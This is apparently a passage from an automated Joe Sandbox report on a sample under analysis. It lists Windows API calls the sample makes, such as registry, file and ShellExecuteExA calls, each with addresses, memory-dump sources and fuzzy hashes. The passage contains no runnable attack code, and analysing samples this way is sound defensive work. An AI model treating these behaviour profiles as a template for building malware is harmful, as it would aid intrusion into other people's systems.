                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 390214022-0
                                                                                                    • Opcode ID: ba3bde256958aa91b5d9155f67b7e0bfbb45c1f83cf4986586dcfc7af96a5ed0
                                                                                                    • Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
                                                                                                    • Opcode Fuzzy Hash: ba3bde256958aa91b5d9155f67b7e0bfbb45c1f83cf4986586dcfc7af96a5ed0
                                                                                                    • Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279
                                                                                                    APIs
                                                                                                    • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PathSearch
                                                                                                    • String ID:
                                                                                                    • API String ID: 2203818243-0
                                                                                                    • Opcode ID: d14bdcf4c531334952570e8fbab461e107b4b7945dcdc90744cade2c00435980
                                                                                                    • Instruction ID: eb17f69382d89759ebdee5c9dd5d6a4f0c1420afe9db4a8697d1259c8666677d
                                                                                                    • Opcode Fuzzy Hash: d14bdcf4c531334952570e8fbab461e107b4b7945dcdc90744cade2c00435980
                                                                                                    • Instruction Fuzzy Hash: 80E0D871304110EFD710DF649E49BAB3758DB01368B20817AF111A60C1D5B89905872D
                                                                                                    APIs
                                                                                                    • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FB1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 2289755597-0
                                                                                                    • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                                    • Instruction ID: 0f1f398a2e861ffee82e275805f4c84720ea89191264ee960a0e3bcb1bee2725
                                                                                                    • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                                    • Instruction Fuzzy Hash: DAE0ECB211450ABEEF099F90DC0ADBB371DEB04300F10492EF956E5090E6B9AE30AE75
                                                                                                    APIs
                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403290,00000000,00792120,000000FF,00792120,000000FF,000000FF,00000004,00000000), ref: 00405D28
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                    • Instruction ID: 77bff2a1fb4a149192ffadfb645e09873699659932145b723af6e3d7aa9a80e5
                                                                                                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                    • Instruction Fuzzy Hash: 35E0EC3222065AABDF109E659C04AEB7B6CEF05360F008837FE55F3190D635E9219BA8
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032DA,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405CF9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                                                    • Instruction ID: 359c21f91a3bba3ce6496bf321611394009143f850dd69016ead32bb33babeaa
                                                                                                    • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                                                    • Instruction Fuzzy Hash: 08E0863210011EABCF106E909C08FEB775CEF00350F048433FD15E2040E230E8209BA4
                                                                                                    APIs
                                                                                                    • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString
                                                                                                    • String ID:
                                                                                                    • API String ID: 1096422788-0
                                                                                                    • Opcode ID: b4a7043687678eaf2842448dab2c2e4ba0dbc20ac3a1ee677ae887269f19e7fe
                                                                                                    • Instruction ID: ec2b9ed2aa8753cc56e49b6d1f5b0ead50a941972cde74363bc07da0fbfd84e4
                                                                                                    • Opcode Fuzzy Hash: b4a7043687678eaf2842448dab2c2e4ba0dbc20ac3a1ee677ae887269f19e7fe
                                                                                                    • Instruction Fuzzy Hash: 40E04630904208BAEB006FA08E09EAD3A79EF01710F20003AF9617B0D1E6B89482D72E
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405FE8,?,?,?,?,00000002,: Completed), ref: 00405F7E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                    • Instruction ID: f6689eb4189efde595c0db3434e8a658027b475c8950a5948bd102936423b03e
                                                                                                    • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                    • Instruction Fuzzy Hash: A4D0123210420EBBDF119F90DD05FAB371DEB08314F108426FE16A4091D775D930AB64
                                                                                                    APIs
                                                                                                    • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 19daa51e0f4140c20b364a7b1aadfe9bb6fd55095eb541cb7129b1dc5595d207
                                                                                                    • Instruction ID: 91fe89217483e075e92c8728b5a4931aee7e8ed68981fb3eb44f78270fd31ef9
                                                                                                    • Opcode Fuzzy Hash: 19daa51e0f4140c20b364a7b1aadfe9bb6fd55095eb541cb7129b1dc5595d207
                                                                                                    • Instruction Fuzzy Hash: 25D0C232704114DBCB00EFA49B0868E73A1EB00324B30C137E011F21C1D6B8CA059A2D
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(0001043E,00000000,00000000,00000000), ref: 004041B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: d4215b7baf76609f405edbe0fa82b00310db822e245eb28315c78f51e7c0a9c8
                                                                                                    • Instruction ID: 112480d2ae0494b2a53595d3f997b831fbc8a903dfd304933042e2292820a1e0
                                                                                                    • Opcode Fuzzy Hash: d4215b7baf76609f405edbe0fa82b00310db822e245eb28315c78f51e7c0a9c8
                                                                                                    • Instruction Fuzzy Hash: 40C09B757447007FDA109B649E49F0777D4A791700F14842DB740F50D1D674D450D65C
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,0001C3E4), ref: 004032EB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                    • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                                                    • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                    • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000028,?,00000001,00403FBD), ref: 0040419B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 8afc8e775a4383b0d9481be42871f9dd90f51651ac4b72857f61fbe09a3a2cc3
                                                                                                    • Instruction ID: 18e6939d06ef43c2e98f2159044487ea81de3fce7c02a663ceb4602929a6bce1
                                                                                                    • Opcode Fuzzy Hash: 8afc8e775a4383b0d9481be42871f9dd90f51651ac4b72857f61fbe09a3a2cc3
                                                                                                    • Instruction Fuzzy Hash: A2B09235184A00AFDA114B10DE09F457A62E7A4701F008028B240240F0CAB200A5EB09
                                                                                                    APIs
                                                                                                    • ShellExecuteExA.SHELL32(?,00401F5C,?), ref: 004057C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecuteShell
                                                                                                    • String ID:
                                                                                                    • API String ID: 587946157-0
                                                                                                    • Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                                                                                    • Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
                                                                                                    • Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                                                                                    • Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00403F56), ref: 00404184
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
